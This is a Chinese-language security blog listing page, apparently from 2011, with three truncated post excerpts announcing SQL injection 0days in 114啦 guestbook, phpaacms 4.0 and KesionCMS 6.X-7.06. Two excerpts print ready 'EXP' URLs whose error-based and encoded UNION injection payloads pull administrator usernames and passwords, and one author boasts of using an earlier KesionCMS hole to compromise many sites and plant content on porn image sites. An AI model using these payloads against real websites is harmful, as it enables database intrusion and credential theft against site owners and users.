114啦网址导航留言本注入

分类:安全 | 2011-07-30 | 撸过 565 次
0人扯谈

漏洞文件feedback/feedback.php

 
影响版本 <=1.5

 

$username = empty($_POST['username']) ? '' : strip_tags(iconv('UTF-8', 'GBK', $_POST['username'])); $email = (isset($_POST['email'])) ? strip_tags(iconv('UTF-8', 'GBK', $_POST['email'])) : ''; $content = (isset($_POST['content'])) ? tri[......]

继续阅读

phpaacms 4.0 Sql 注入0day漏洞及修复

分类:安全 | 2011-07-30 | 撸过 542 次
0人扯谈

phpaacms是一套免费开源的简洁文章管理系统cms.

漏洞文件:search.php //变量$_GET['id']过滤不严造成的注射

测试EXP:

https://www.webshell.cc/phpaacms/search.php?id=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20concat(0x7e,0x27,phpaacms_users.password,0x27,0x7e)%20FROM%20`phpaa`.phpaacms_users%20LIMIT%2[......]

继续阅读

科汛CMS 6.X-7.06最新注入0day

分类:安全 | 2011-07-30 | 撸过 765 次
0人扯谈

kesionCMS用的人非常多哦。经常也被暴洞。记得几年前藏着一个科汛的HTTP头注入

0day日了好多站,那时候多喜欢挂驴。搞了好多黄色图片站来挂。

这次暴的洞是T00LS的核心先发的。然后论坛一个社工牛给社了后研究出来的。

直接暴管理员帐号和密码的EXP:

https://www.webshell.cc/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C[......]

继续阅读

第 70 页,共 70 页« 最新...102030...6667686970